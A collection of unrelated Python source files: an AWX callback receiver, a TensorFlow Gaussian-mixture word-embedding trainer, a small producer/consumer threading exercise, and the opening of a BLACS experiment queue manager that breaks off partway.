data = records[uid].to_dict()
else:
data = ReportRecord().to_dict()
return {"result": "success", "data": data}
def _dump_report(report_server, persistence):
while True:
time.sleep(1)
global _records_lock, _modified
with _records_lock:
if not _modified:
continue
all_records = deepcopy(report_server.all_records)
_modified = False
try:
persistence.save_report(all_records)
# TODO
# persistence.pickle_report(report_server._hist_records, report_server.__instances__)
report_server.backup_output_path()
except Exception as e:
logging.warning(f"Failed to dump reports, message={str(e)}")
|
run_callback_receiver.py
|
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
import logging
import os
import signal
import time
from uuid import UUID
from multiprocessing import Process
from multiprocessing import Queue as MPQueue
from Queue import Empty as QueueEmpty
from Queue import Full as QueueFull
from kombu import Connection, Exchange, Queue
from kombu.mixins import ConsumerMixin
# Django
from django.conf import settings
from django.core.management.base import BaseCommand
from django.db import connection as django_connection
from django.db import DatabaseError, OperationalError
from django.db.utils import InterfaceError, InternalError
from django.core.cache import cache as django_cache
# AWX
from awx.main.models import * # noqa
from awx.main.consumers import emit_channel_notification
logger = logging.getLogger('awx.main.commands.run_callback_receiver')
class WorkerSignalHandler:
def __init__(self):
self.kill_now = False
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self, *args, **kwargs):
self.kill_now = True
class CallbackBrokerWorker(ConsumerMixin):
MAX_RETRIES = 2
def __init__(self, connection, use_workers=True):
self.connection = connection
self.worker_queues = []
self.total_messages = 0
self.init_workers(use_workers)
def init_workers(self, use_workers=True):
def shutdown_handler(active_workers):
def _handler(signum, frame):
try:
for active_worker in active_workers:
active_worker.terminate()
signal.signal(signum, signal.SIG_DFL)
os.kill(os.getpid(), signum) # Rethrow signal, this time without catching it
except Exception:
logger.exception('Error in shutdown_handler')
return _handler
if use_workers:
for idx in range(settings.JOB_EVENT_WORKERS):
queue_actual = MPQueue(settings.JOB_EVENT_MAX_QUEUE_SIZE)
w = Process(target=self.callback_worker, args=(queue_actual, idx,))
if settings.DEBUG:
logger.info('Starting worker %s' % str(idx))
self.worker_queues.append([0, queue_actual, w])
# It's important to close these _right before_ we fork; we
# don't want the forked processes to inherit the open sockets
# for the DB and memcached connections (that way lies race
# conditions)
django_connection.close()
django_cache.close()
for _, _, w in self.worker_queues:
w.start()
elif settings.DEBUG:
logger.warn('Started callback receiver (no workers)')
signal.signal(signal.SIGINT, shutdown_handler([p[2] for p in self.worker_queues]))
signal.signal(signal.SIGTERM, shutdown_handler([p[2] for p in self.worker_queues]))
def get_consumers(self, Consumer, channel):
return [Consumer(queues=[Queue(settings.CALLBACK_QUEUE,
Exchange(settings.CALLBACK_QUEUE, type='direct'),
routing_key=settings.CALLBACK_QUEUE)],
accept=['json'],
callbacks=[self.process_task])]
def process_task(self, body, message):
if "uuid" in body and body['uuid']:
try:
queue = UUID(body['uuid']).int % settings.JOB_EVENT_WORKERS
except Exception:
queue = self.total_messages % settings.JOB_EVENT_WORKERS
else:
queue = self.total_messages % settings.JOB_EVENT_WORKERS
self.write_queue_worker(queue, body)
self.total_messages += 1
message.ack()
def write_queue_worker(self, preferred_queue, body):
queue_order = sorted(range(settings.JOB_EVENT_WORKERS), cmp=lambda x, y: -1 if x==preferred_queue else 0)
write_attempt_order = []
for queue_actual in queue_order:
try:
worker_actual = self.worker_queues[queue_actual]
worker_actual[1].put(body, block=True, timeout=5)
worker_actual[0] += 1
return queue_actual
except QueueFull:
pass
except Exception:
import traceback
tb = traceback.format_exc()
logger.warn("Could not write to queue %s" % preferred_queue)
logger.warn("Detail: {}".format(tb))
write_attempt_order.append(preferred_queue)
logger.warn("Could not write payload to any queue, attempted order: {}".format(write_attempt_order))
return None
def callback_worker(self, queue_actual, idx):
signal_handler = WorkerSignalHandler()
while not signal_handler.kill_now:
try:
body = queue_actual.get(block=True, timeout=1)
except QueueEmpty:
continue
except Exception as e:
logger.error("Exception on worker thread, restarting: " + str(e))
continue
try:
event_map = {
'job_id': JobEvent,
'ad_hoc_command_id': AdHocCommandEvent,
'project_update_id': ProjectUpdateEvent,
'inventory_update_id': InventoryUpdateEvent,
'system_job_id': SystemJobEvent,
}
if not any([key in body for key in event_map]):
raise Exception('Payload does not have a job identifier')
if settings.DEBUG:
from pygments import highlight
from pygments.lexers import PythonLexer
from pygments.formatters import Terminal256Formatter
from pprint import pformat
logger.info('Body: {}'.format(
highlight(pformat(body, width=160), PythonLexer(), Terminal256Formatter(style='friendly'))
)[:1024 * 4])
def _save_event_data():
for key, cls in event_map.items():
if key in body:
cls.create_from_data(**body)
job_identifier = 'unknown job'
for key in event_map.keys():
if key in body:
job_identifier = body[key]
break
if body.get('event') == 'EOF':
try:
final_counter = body.get('final_counter', 0)
logger.info('Event processing is finished for Job {}, sending notifications'.format(job_identifier))
# EOF events are sent when stdout for the running task is
# closed. don't actually persist them to the database; we
# just use them to report `summary` websocket events as an
# approximation for when a job is "done"
emit_channel_notification(
'jobs-summary',
dict(group_name='jobs', unified_job_id=job_identifier, final_counter=final_counter)
)
# Additionally, when we've processed all events, we should
# have all the data we need to send out success/failure
# notification templates
uj = UnifiedJob.objects.get(pk=job_identifier)
if hasattr(uj, 'send_notification_templates'):
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
break
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_identifier)
except Exception:
logger.exception('Worker failed to emit notifications: Job {}'.format(job_identifier))
continue
retries = 0
while retries <= self.MAX_RETRIES:
try:
_save_event_data()
break
except (OperationalError, InterfaceError, InternalError) as e:
if retries >= self.MAX_RETRIES:
logger.exception('Worker could not re-establish database connectivity, shutting down gracefully: Job {}'.format(job_identifier))
os.kill(os.getppid(), signal.SIGINT)
return
delay = 60 * retries
logger.exception('Database Error Saving Job Event, retry #{i} in {delay} seconds:'.format(
i=retries + 1,
delay=delay
))
django_connection.close()
time.sleep(delay)
retries += 1
except DatabaseError as e:
logger.exception('Database Error Saving Job Event for Job {}'.format(job_identifier))
break
except Exception as exc:
import traceback
tb = traceback.format_exc()
logger.error('Callback Task Processor Raised Exception: %r', exc)
logger.error('Detail: {}'.format(tb))
class Command(BaseCommand):
'''
Save Job Callback receiver (see awx.plugins.callbacks.job_event_callback)
Runs as a management command and receives job save events. It then hands
them off to worker processors (see Worker) which writes them to the database
'''
help = 'Launch the job callback receiver'
def handle(self, *arg, **options):
with Connection(settings.BROKER_URL) as conn:
try:
worker = CallbackBrokerWorker(conn)
worker.run()
except KeyboardInterrupt:
print('Terminating Callback Receiver')
|
regularized_embeddings.py
|
"""
Ben Athiwaratkun
Training code for Gaussian Mixture word embeddings model
Adapted from tensorflow's word2vec.py
(https://github.com/tensorflow/models/blob/master/tutorials/embedding/word2vec.py)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
import math
# Retrict to CPU only
os.environ["CUDA_VISIBLE_DEVICES"]=""
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
import pickle
#from tensorflow.models.embedding import gen_word2vec as word2vec
#word2vec = tf.load_op_library(os.path.join(os.path.di))
word2vec = tf.load_op_library(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'word2vec_ops.so'))
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model and "
"training summaries. (required)")
flags.DEFINE_string("train_data", None, "Training text file. (required)")
flags.DEFINE_integer("embedding_size", 50, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 5,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.2, "Initial learning rate.")
flags.DEFINE_integer("batch_size", 256,
"Number of training examples processed per step "
"(size of a minibatch).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_float("regularization_coeff", 0.005,
"Regularization coefficient.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_integer("statistics_interval", 5,
"Print statistics every n seconds.")
flags.DEFINE_integer("summary_interval", 5,
"Save training summary to file every n seconds (rounded "
"up to statistics interval).")
flags.DEFINE_integer("checkpoint_interval", 600,
"Checkpoint the model (i.e. save the parameters) every n "
"seconds (rounded up to statistics interval).")
flags.DEFINE_integer("num_mixtures", 2,
"Number of mixture component for Mixture of Gaussians")
flags.DEFINE_boolean("spherical", False,
"Whether the model should be spherical of diagonal"
"The default is spherical")
flags.DEFINE_float("var_scale", 0.05, "Variance scale")
flags.DEFINE_boolean("ckpt_all", False, "Keep all checkpoints"
"(Warning: This requires a large amount of disk space).")
flags.DEFINE_float("norm_cap", 3.0,
"The upper bound of norm of mean vector")
flags.DEFINE_float("lower_sig", 0.02,
"The lower bound for sigma element-wise")
flags.DEFINE_float("upper_sig", 5.0,
"The upper bound for sigma element-wise")
flags.DEFINE_float("mu_scale", 1.0,
"The average norm will be around mu_scale")
flags.DEFINE_float("objective_threshold", 1.0,
"The threshold for the objective")
flags.DEFINE_boolean("adagrad", False,
"Use Adagrad optimizer instead")
flags.DEFINE_float("loss_epsilon", 1e-4,
"epsilon parameter for loss function")
flags.DEFINE_boolean("constant_lr", False,
"Use constant learning rate")
flags.DEFINE_boolean("wout", False,
"Whether we would use a separate wout")
flags.DEFINE_boolean("max_pe", False,
"Using maximum of partial energy instead of the sum")
flags.DEFINE_integer("max_to_keep", 5,
"The maximum number of checkpoint files to keep")
flags.DEFINE_boolean("normclip", False,
"Whether to perform norm clipping (very slow)")
flags.DEFINE_string("rep", "gm", 'The type of representation. Either gm or vec')
flags.DEFINE_integer("fixvar", 0, "whether to fix the variance or not")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our Word2MultiGauss model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurgnt training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# George Ho: Regularization coefficient.
self.regularization_coeff = FLAGS.regularization_coeff
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# How often to print statistics.
self.statistics_interval = FLAGS.statistics_interval
# How often to write to the summary file (rounds up to the nearest
# statistics_interval).
self.summary_interval = FLAGS.summary_interval
# How often to write checkpoints (rounds up to the nearest statistics
# interval).
self.checkpoint_interval = FLAGS.checkpoint_interval
# Where to write out summaries.
self.save_path = FLAGS.save_path
#################################
self.num_mixtures = FLAGS.num_mixtures # incorporated. needs testing
# upper bound of norm of mu
self.norm_cap = FLAGS.norm_cap
# element-wise lower bound for sigma
self.lower_sig = FLAGS.lower_sig
# element-wise upper bound for sigma
self.upper_sig = FLAGS.upper_sig
# whether to use spherical or diagonal covariance
self.spherical = FLAGS.spherical ## default to False please
self.var_scale = FLAGS.var_scale
self.ckpt_all = FLAGS.ckpt_all
self.mu_scale = FLAGS.mu_scale
self.objective_threshold = FLAGS.objective_threshold
self.adagrad = FLAGS.adagrad
self.loss_epsilon = FLAGS.loss_epsilon
self.constant_lr = FLAGS.constant_lr
self.wout = FLAGS.wout
self.max_pe = FLAGS.max_pe
self.max_to_keep = FLAGS.max_to_keep
self.normclip = FLAGS.normclip
## value clipping
self.norm_cap = FLAGS.norm_cap
self.upper_sig = FLAGS.upper_sig
self.lower_sig = FLAGS.lower_sig
self.rep = FLAGS.rep
self.fixvar = FLAGS.fixvar
class Word2GMtrainer(object):
def __init__(self, options, session):
self._options = options
# Ben A: print important opts
opts = options
print('--------------------------------------------------------')
print('Rep {}'.format(opts.rep))
print('Train data {}'.format(opts.train_data))
print('Norm cap {} lower sig {} upper sig {}'.format(opts.norm_cap,
opts.lower_sig, opts.upper_sig))
print('mu_scale {} var_scale {}'.format(opts.mu_scale, opts.var_scale))
print('Num Mixtures {} Spherical Mode = {}'.format(opts.num_mixtures, opts.spherical))
print('Emb dim {}'.format(opts.emb_dim))
print('Epochs to train {}'.format(opts.epochs_to_train))
print('Learning rate {} // constant {}'.format(opts.learning_rate, opts.constant_lr))
print('Using a separate Wout = {}'.format(opts.wout))
print('Subsampling rate = {}'.format(opts.subsample))
print('Using Max Partial Energy Loss = {}'.format(opts.max_pe))
print('Loss Epsilon = {}'.format(opts.loss_epsilon))
print('Saving results to = {}'.format(options.save_path))
print('--------------------------------------------------------')
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph() #
self.save_vocab()
def optimize(self, loss):
"""Build the graph to optimize the loss function."""
# Optimizer nodes.
# Linear learning rate decay.
opts = self._options
if opts.constant_lr:
self._lr = tf.constant(opts.learning_rate)
else:
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001, 1.0 - tf.cast(self._words, tf.float32) / words_to_train)
self._lr = lr
optimizer = tf.train.GradientDescentOptimizer(self._lr)
train = optimizer.minimize(loss,
global_step=self.global_step,
gate_gradients=optimizer.GATE_NONE)
self._train = train
def optimize_adam(self, loss):
# deprecated
opts = self._options
# use automatic decay of learning rate in Adam
self._lr = tf.constant(opts.learning_rate)
self.adam_epsilon = opts.adam_epsilon
optimizer = tf.train.AdamOptimizer(self._lr, epsilon=self.adam_epsilon)
train = optimizer.minimize(loss, global_step=self.global_step,
gate_gradients=optimizer.GATE_NONE)
self._train = train
def optimize_adagrad(self, loss):
print('Using Adagrad optimizer')
opts = self._options
if opts.constant_lr:
self._lr = tf.constant(opts.learning_rate)
else:
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001, 1.0 - tf.cast(self._words, tf.float32) / words_to_train)
self._lr = lr
optimizer = tf.train.AdagradOptimizer(self._lr)
train = optimizer.minimize(loss,
global_step=self.global_step,
gate_gradients=optimizer.GATE_NONE)
self._train = train
def calculate_loss(self, word_idxs, pos_idxs):
# This is two methods in one (forward and nce_loss)
self.global_step = tf.Variable(0, name="global_step")
opts = self._options
#####################################################
# the model parameters
vocabulary_size = opts.vocab_size
embedding_size = opts.emb_dim
batch_size = opts.batch_size
regularization_coeff = opts.regularization_coeff
norm_cap = opts.norm_cap
lower_sig = opts.lower_sig
upper_sig = opts.upper_sig
self.norm_cap = norm_cap
self.lower_logsig = math.log(lower_sig)
self.upper_logsig = math.log(upper_sig)
num_mixtures = opts.num_mixtures
spherical = opts.spherical
objective_threshold = opts.objective_threshold
# the model parameters
mu_scale = opts.mu_scale*math.sqrt(3.0/(1.0*embedding_size))
mus = tf.get_variable('mu', initializer=tf.random_uniform([vocabulary_size, num_mixtures, embedding_size], -mu_scale, mu_scale))
if opts.wout:
mus_out = tf.get_variable('mu_out', tf.random_uniform([vocabulary_size, num_mixtures, embedding_size], -mu_scale, mu_scale))
# This intialization makes the variance around 1
var_scale = opts.var_scale
logvar_scale = math.log(var_scale)
print('mu_scale = {} var_scale = {}'.format(mu_scale, var_scale))
var_trainable = 1-self._options.fixvar
print('var trainable =', var_trainable)
if spherical:
logsigs = tf.get_variable('sigma',
initializer=tf.random_uniform([vocabulary_size, num_mixtures,1],
logvar_scale, logvar_scale), trainable=var_trainable)
if opts.wout:
logsigs_out = tf.get_variable('sigma_out',
initializer=tf.random_uniform([vocabulary_size, num_mixtures,1],
logvar_scale, logvar_scale), trainable=var_trainable)
else:
logsigs = tf.get_variable('sigma',
initializer=tf.random_uniform([vocabulary_size, num_mixtures, embedding_size],
logvar_scale, logvar_scale), trainable=var_trainable)
if opts.wout:
logsigs_out = tf.get_variable('sigma_out',
initializer=tf.random_uniform([vocabulary_size, num_mixtures, embedding_size],
logvar_scale, logvar_scale), trainable=var_trainable)
mixture = tf.get_variable('mixture', initializer=tf.random_uniform([vocabulary_size, num_mixtures], 0, 0))
if opts.wout:
mixture_out = tf.get_variable('mixxture_out', initializer=tf.random_uniform([vocabulary_size, num_mixtures], 0, 0))
if not opts.wout:
mus_out = mus
logsigs_out = logsigs
mixture_out = mixture
zeros_vec = tf.zeros([batch_size], name='zeros')
self._mus = mus
self._logsigs = logsigs
labels_matrix = tf.reshape(
tf.cast(pos_idxs,
dtype=tf.int64),
[opts.batch_size, 1])
# Negative sampling.
neg_idxs, _, _ = (tf.nn.fixed_unigram_candidate_sampler(
true_classes=labels_matrix,
num_true=1,
num_sampled=opts.batch_size, # Use 1 negative sample per positive sample
unique=True,
range_max=opts.vocab_size,
distortion=0.75,
unigrams=opts.vocab_counts.tolist(), name='neg_idxs'))
self._neg_idxs = neg_idxs
def log_energy(mu1, sig1, mix1, mu2, sig2, mix2, only_bw_modes=False):
### need to pass mix that's compatible!
### George Ho: `only_bw_modes` precludes computing log energies
### between the same mode. For the regularization. Make sure to pass in
### mixes of the same length!
def partial_logenergy(cl1, cl2):
m1 = mu1[:,cl1,:]
m2 = mu2[:,cl2,:]
s1 = sig1[:,cl1,:]
s2 = sig2[:,cl2,:]
with tf.name_scope('partial_logenergy') as scope:
_a = tf.add(s1, s2) # should be do max add for stability?
epsilon = opts.loss_epsilon
if spherical:
logdet = embedding_size*tf.log(epsilon + tf.squeeze(_a))
else:
logdet = tf.reduce_sum(tf.log(epsilon + _a), reduction_indices=1, name='logdet')
ss_inv = 1./(epsilon + _a)
#diff = tf.sub(m1, m2)
diff = tf.subtract(m1, m2)
exp_term = tf.reduce_sum(diff*ss_inv*diff, reduction_indices=1, name='expterm')
pe = -0.5*logdet - 0.5*exp_term
return pe
with tf.name_scope('logenergy') as scope:
log_e_list = []
mix_list = []
for cl1 in xrange(num_mixtures):
for cl2 in xrange(num_mixtures):
if (not only_bw_modes) or cl1 != cl2:
log_e_list.append(partial_logenergy(cl1, cl2))
mix_list.append(mix1[:,cl1]*mix2[:,cl2])
log_e_pack = tf.stack(log_e_list)
log_e_max = tf.reduce_max(log_e_list, reduction_indices=0)
if opts.max_pe:
# Ben A: got this warning for max_pe
# UserWarning:
# Convering sparse IndexedSlices to a dense Tensor of unknown shape. This may consume a large amount of memory.
log_e_argmax = tf.argmax(log_e_list, dimension=0)
log_e = log_e_max*tf.gather(mix_list, log_e_argmax)
else:
mix_pack = tf.stack(mix_list)
log_e = tf.log(tf.reduce_sum(mix_pack*tf.exp(log_e_pack-log_e_max), reduction_indices=0))
log_e += log_e_max
return log_e
def Lfunc(word_idxs, pos_idxs, neg_idxs):
with tf.name_scope('LossCal') as scope:
mu_embed = tf.nn.embedding_lookup(mus, word_idxs, name='MuWord')
mu_embed_pos = tf.nn.embedding_lookup(mus_out, pos_idxs, name='MuPos')
mu_embed_neg = tf.nn.embedding_lookup(mus_out, neg_idxs, name='MuNeg')
sig_embed = tf.exp(tf.nn.embedding_lookup(logsigs, word_idxs), name='SigWord')
sig_embed_pos = tf.exp(tf.nn.embedding_lookup(logsigs_out, pos_idxs), name='SigPos')
sig_embed_neg = tf.exp(tf.nn.embedding_lookup(logsigs_out, neg_idxs), name='SigNeg')
mix_word = tf.nn.softmax(tf.nn.embedding_lookup(mixture, word_idxs), name='MixWord')
mix_pos = tf.nn.softmax(tf.nn.embedding_lookup(mixture_out, pos_idxs), name='MixPos')
mix_neg = tf.nn.softmax(tf.nn.embedding_lookup(mixture_out, neg_idxs), name='MixNeg')
epos = log_energy(mu_embed, sig_embed, mix_word, mu_embed_pos, sig_embed_pos, mix_pos)
eneg = log_energy(mu_embed, sig_embed, mix_word, mu_embed_neg, sig_embed_neg, mix_neg)
eself = log_energy(mu_embed, sig_embed, mix_word, mu_embed, sig_embed, mix_word, only_bw_modes=True)
loss_indiv = tf.maximum(zeros_vec, objective_threshold - epos + eneg,
name='CalculateIndividualLoss')
reg_indiv = regularization_coeff * eself
loss = tf.reduce_mean(loss_indiv, name='AveLoss')
reg = tf.reduce_mean(reg_indiv, name='AveReg')
return loss + tf.exp(-reg), loss, reg
loss_reg, loss, reg = Lfunc(word_idxs, pos_idxs, neg_idxs)
tf.summary.scalar('loss', loss)
tf.summary.scalar('reg', reg)
return loss_reg
def clip_ops_graph(self, word_idxs, pos_idxs, neg_idxs):
def clip_val_ref(embedding, idxs):
with tf.name_scope('clip_val'):
to_update = tf.nn.embedding_lookup(embedding, idxs)
to_update = tf.maximum(self.lower_logsig, tf.minimum(self.upper_logsig, to_update))
return tf.scatter_update(embedding, idxs, to_update)
def clip_norm_ref(embedding, idxs):
with tf.name_scope('clip_norm_ref') as scope:
to_update = tf.nn.embedding_lookup(embedding, idxs)
to_update = tf.clip_by_norm(to_update, self.norm_cap, axes=2)
return tf.scatter_update(embedding, idxs, to_update)
clip1 = clip_norm_ref(self._mus, word_idxs)
clip2 = clip_norm_ref(self._mus, pos_idxs)
clip3 = clip_norm_ref(self._mus, neg_idxs)
clip4 = clip_val_ref(self._logsigs, word_idxs)
clip5 = clip_val_ref(self._logsigs, pos_idxs)
clip6 = clip_val_ref(self._logsigs, neg_idxs)
return [clip1, clip2, clip3, clip4, clip5, clip6]
def build_graph(self):
"""Build the graph for the full model."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, self._epoch, self._words, examples,
labels) = word2vec.skipgram_word2vec(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._examples = examples
self._labels = labels
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
pickle.dump(self._word2id, open("word2id.pkl", 'wb'))
loss = self.calculate_loss(examples, labels)
self._loss = loss
if opts.normclip:
self._clip_ops = self.clip_ops_graph(self._examples, self._labels, self._neg_idxs)
if opts.adagrad:
print("Using Adagrad as an optimizer!")
self.optimize_adagrad(loss)
else:
# Using Standard SGD
self.optimize(loss)
# Properly initialize all variables.
self.check_op = tf.add_check_numerics_ops()
tf.initialize_all_variables().run()
try:
print('Try using saver version v2')
self.saver = tf.train.Saver(write_version=tf.train.SaverDef.V2, max_to_keep = opts.max_to_keep)
except:
print('Default to saver version v1')
self.saver = tf.train.Saver(max_to_keep=opts.max_to_keep)
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
vocab_word = tf.compat.as_text(opts.vocab_words[i]).encode("utf-8")
f.write("%s %d\n" % (vocab_word,
opts.vocab_counts[i]))
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
# This is where the optimizer that minimizes loss (self._train) is run
if not self._options.normclip:
_, epoch = self._session.run([self._train, self._epoch])
else:
_, epoch, _ = self._session.run([self._train, self._epoch, self._clip_ops])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(opts.save_path, self._session.graph)
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time, last_summary_time = initial_words, time.time(), 0
last_checkpoint_time = 0
step_manual = 0
while True:
time.sleep(opts.statistics_interval) # Reports our progress once a while.
(epoch, step, loss, words, lr) = self._session.run(
[self._epoch, self.global_step, self._loss, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f loss = %6.2f words/sec = %8.0f\n" %
(epoch, step, lr, loss, rate), end="")
sys.stdout.flush()
if now - last_summary_time > opts.summary_interval:
summary_str = self._session.run(summary_op)
summary_writer.add_summary(summary_str, step)
last_summary_time = now
if now - last_checkpoint_time > opts.checkpoint_interval:
self.saver.save(self._session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=step.astype(int))
last_checkpoint_time = now
if epoch != initial_epoch:
break
step_manual += 1
for t in workers:
t.join()
return epoch
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
if not FLAGS.train_data or not FLAGS.save_path:
print("--train_data and --save_path must be specified.")
sys.exit(1)
if not os.path.exists(FLAGS.save_path):
print('Creating new directory', FLAGS.save_path)
os.makedirs(FLAGS.save_path)
else:
print('The directory already exists', FLAGS.save_path)
opts = Options()
print('Saving results to {}'.format(opts.save_path))
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2GMtrainer(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train()
# Perform a final save.
model.saver.save(session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=model.global_step)
with tf.variable_scope('', reuse=tf.AUTO_REUSE):
sigmas = session.run(tf.get_variable("sigma"))
mus = session.run(tf.get_variable("mu"))
np.save("sigma.npy", sigmas)
np.save("mu.npy", mus)
if __name__ == "__main__":
tf.app.run()
|
multithreads6.py
|
import time, random
import queue, threading
q = queue.Queue()
def Producer(name):
count = 0
while count < 10:
print("制造包子ing")
time.sleep(random.randrange(3))
q.put(count)
print('生产者 %s 生产了 %s 包子..' % (name, count))
count += 1
q.task_done()
# q.join()
def Consumer(name):
count = 0
while count < 10:
time.sleep(random.randrange(4))
data = q.get()
# q.task_done()
print('等待中')
q.join()
print('消费者 %s 消费了 %s 包子...' % (name, data))
count += 1
c1 = threading.Thread(target=Producer, args=('小明',))
c2 = threading.Thread(target=Consumer, args=('小花',))
c3 = threading.Thread(target=Consumer, args=('小灰',))
c4 = threading.Thread(target=Consumer, args=('小天',))
c1.start()
c2.start()
c3.start()
c4.start()
|
experiment_queue.py
|
#####################################################################
# #
# /experiment_queue.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
import queue
import logging
import os
import threading
import time
import datetime
import sys
import shutil
from collections import defaultdict
from tempfile import gettempdir
from binascii import hexlify
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
import zprocess
from labscript_utils.ls_zprocess import ProcessTree
process_tree = ProcessTree.instance()
import labscript_utils.h5_lock, h5py
from qtutils import *
from labscript_utils.qtwidgets.elide_label import elide_label
from labscript_utils.connections import ConnectionTable
import labscript_utils.properties
from blacs.tab_base_classes import MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL, MODE_BUFFERED
import blacs.plugins as plugins
def tempfilename(prefix='BLACS-temp-', suffix='.h5'):
"""Return a filepath appropriate for use as a temporary file"""
random_hex = hexlify(os.urandom(16)).decode()
return os.path.join(gettempdir(), prefix + random_hex + suffix)
FILEPATH_COLUMN = 0
class QueueTreeview(QTreeView):
def __init__(self,*args,**kwargs):
QTreeView.__init__(self,*args,**kwargs)
self.header().setStretchLastSection(True)
self.setAutoScroll(False)
self.add_to_queue = None
self.delete_selection = None
self._logger = logging.getLogger('BLACS.QueueManager')
def keyPressEvent(self,event):
if event.key() == Qt.Key_Delete:
event.accept()
if self.delete_selection:
self.delete_selection()
QTreeView.keyPressEvent(self,event)
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
event.accept()
else:
event.ignore()
def dragMoveEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
else:
event.ignore()
def dropEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
for url in event.mimeData().urls():
path = str(url.toLocalFile())
if path.endswith('.h5') or path.endswith('.hdf5'):
self._logger.info('Acceptable file dropped. Path is %s'%path)
if self.add_to_queue:
self.add_to_queue(str(path))
else:
self._logger.info('Dropped file not added to queue because there is no access to the neccessary add_to_queue method')
else:
self._logger.info('Invalid file dropped. Path was %s'%path)
else:
event.ignore()
class QueueManager(object):
REPEAT_ALL = 0
REPEAT_LAST = 1
ICON_REPEAT = ':qtutils/fugue/arrow-repeat'
ICON_REPEAT_LAST = ':qtutils/fugue/arrow-repeat-once'
def __init__(self, BLACS, ui):
self._ui = ui
self.BLACS = BLACS
self.last_opened_shots_folder = BLACS.exp_config.get('paths', 'experiment_shot_storage')
self._manager_running = True
self._manager_paused = False
self._manager_repeat = False
self._manager_repeat_mode = self.REPEAT_ALL
self.master_pseudoclock = self.BLACS.connection_table.master_pseudoclock
self._logger = logging.getLogger('BLACS.QueueManager')
# Create listview model
self._model = QStandardItemModel()
self._create_headers()
self._ui.treeview.setModel(self._model)
self._ui.treeview.add_to_queue = self.process_request
self._ui.treeview.delete_selection = self._delete_selected_items
# set up buttons
self._ui.queue_pause_button.toggled.connect(self._toggle_pause)
self._ui.queue_repeat_button.toggled.connect(self._toggle_repeat)
self._ui.queue_delete_button.clicked.connect(self._delete_selected_items)
